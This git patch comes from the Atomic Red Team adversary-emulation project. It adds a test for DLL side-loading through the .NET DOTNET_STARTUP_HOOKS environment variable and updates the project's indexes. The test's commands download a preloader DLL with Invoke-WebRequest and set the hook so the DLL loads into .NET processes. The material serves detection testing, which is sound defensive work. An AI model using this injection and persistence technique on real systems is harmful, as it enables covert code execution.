From 1bf4526ffd4020c230d91829bfdca9ec189b9d3b Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Wed, 17 Aug 2022 18:33:58 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 3 + atomics/Indexes/Indexes-CSV/windows-index.csv | 3 + atomics/Indexes/Indexes-Markdown/index.md | 3 + .../Indexes/Indexes-Markdown/windows-index.md | 3 + atomics/Indexes/index.yaml | 147 ++++++++++++++++++ atomics/T1574.002/T1574.002.md | 64 ++++++++ 6 files changed, 223 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ec4d4ac4..15599860 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -398,6 +398,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt @@ -564,6 +565,7 @@ privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt @@ -795,6 +797,7 @@ persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable th persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 36b761ae..5cae1b93 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -291,6 +291,7 @@ defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-4 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +defense-evasion,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt @@ -411,6 +412,7 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +privilege-escalation,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt privilege-escalation,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell @@ -574,6 +576,7 @@ persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),af persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt +persistence,T1574.002,DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt persistence,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 1efcb309..bb5053db 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -590,6 +590,7 @@ - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -895,6 +896,7 @@ - Atomic Test #2: Re-Opened Applications [macos] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) @@ -1347,6 +1349,7 @@ - Atomic Test #2: Re-Opened Applications [macos] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index b5d40221..9001b9d0 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -440,6 +440,7 @@ - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -658,6 +659,7 @@ - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - Atomic Test #1: Logon Scripts [windows] - T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -974,6 +976,7 @@ - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] + - Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows] - T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9a10c7a5..58f04b77 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -24249,6 +24249,55 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' + name: command_prompt + - name: DLL Side-Loading using the dotnet startup hook environment variable + auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02 + description: 'Utilizing the dotnet_startup_hooks environment variable, this + method allows for registering a global method in an assembly that will be + executed whenever a .net core application is started. This unlocks a whole + range of scenarios, from injecting a profiler to tweaking a static context + in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1) + + ' + supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: String + default: calculator.exe + preloader_dll: + description: library for interfacing with the dotnet framework + type: Path + default: PathToAtomicsFolder\T1574.002\bin\preloader + dependency_executor_name: powershell + dependencies: + - description: ".Net SDK must be installed\n" + prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit + 0} else {exit 1} + + ' + get_prereq_command: | + winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null + echo. + - description: 'preloader must exist + + ' + prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1} + + ' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" + -OutFile "#{preloader_dll}" + + ' + executor: + command: | + set DOTNET_STARTUP_HOOKS=#{preloader_dll} + dotnet -h > nul + echo. + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' name: command_prompt T1126: @@ -39454,6 +39503,55 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' + name: command_prompt + - name: DLL Side-Loading using the dotnet startup hook environment variable + auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02 + description: 'Utilizing the dotnet_startup_hooks environment variable, this + method allows for registering a global method in an assembly that will be + executed whenever a .net core application is started. This unlocks a whole + range of scenarios, from injecting a profiler to tweaking a static context + in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1) + + ' + supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: String + default: calculator.exe + preloader_dll: + description: library for interfacing with the dotnet framework + type: Path + default: PathToAtomicsFolder\T1574.002\bin\preloader + dependency_executor_name: powershell + dependencies: + - description: ".Net SDK must be installed\n" + prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit + 0} else {exit 1} + + ' + get_prereq_command: | + winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null + echo. + - description: 'preloader must exist + + ' + prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1} + + ' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" + -OutFile "#{preloader_dll}" + + ' + executor: + command: | + set DOTNET_STARTUP_HOOKS=#{preloader_dll} + dotnet -h > nul + echo. + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' name: command_prompt T1160: @@ -61959,6 +62057,55 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' + name: command_prompt + - name: DLL Side-Loading using the dotnet startup hook environment variable + auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02 + description: 'Utilizing the dotnet_startup_hooks environment variable, this + method allows for registering a global method in an assembly that will be + executed whenever a .net core application is started. This unlocks a whole + range of scenarios, from injecting a profiler to tweaking a static context + in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1) + + ' + supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: String + default: calculator.exe + preloader_dll: + description: library for interfacing with the dotnet framework + type: Path + default: PathToAtomicsFolder\T1574.002\bin\preloader + dependency_executor_name: powershell + dependencies: + - description: ".Net SDK must be installed\n" + prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit + 0} else {exit 1} + + ' + get_prereq_command: | + winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null + echo. + - description: 'preloader must exist + + ' + prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1} + + ' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" + -OutFile "#{preloader_dll}" + + ' + executor: + command: | + set DOTNET_STARTUP_HOOKS=#{preloader_dll} + dotnet -h > nul + echo. + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + ' name: command_prompt T1098.002: diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index 62ab18dc..54fbbd32 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -8,6 +8,8 @@ Side-loading takes advantage of the DLL search order used by the loader by posit - [Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary](#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary) +- [Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable](#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable) +
@@ -60,4 +62,66 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at +
+
+ +## Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable +Utilizing the dotnet_startup_hooks environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .net core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d322cdd7-7d60-46e3-9111-648848da7c02 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| process_name | Name of the created process | String | calculator.exe| +| preloader_dll | library for interfacing with the dotnet framework | Path | PathToAtomicsFolder\T1574.002\bin\preloader| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +set DOTNET_STARTUP_HOOKS=#{preloader_dll} +dotnet -h > nul +echo. +``` + +#### Cleanup Commands: +```cmd +taskkill /F /IM #{process_name} >nul 2>&1 +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: .Net SDK must be installed +##### Check Prereq Commands: +```powershell +if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null +echo. +``` +##### Description: preloader must exist +##### Check Prereq Commands: +```powershell +if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" -OutFile "#{preloader_dll}" +``` + + + +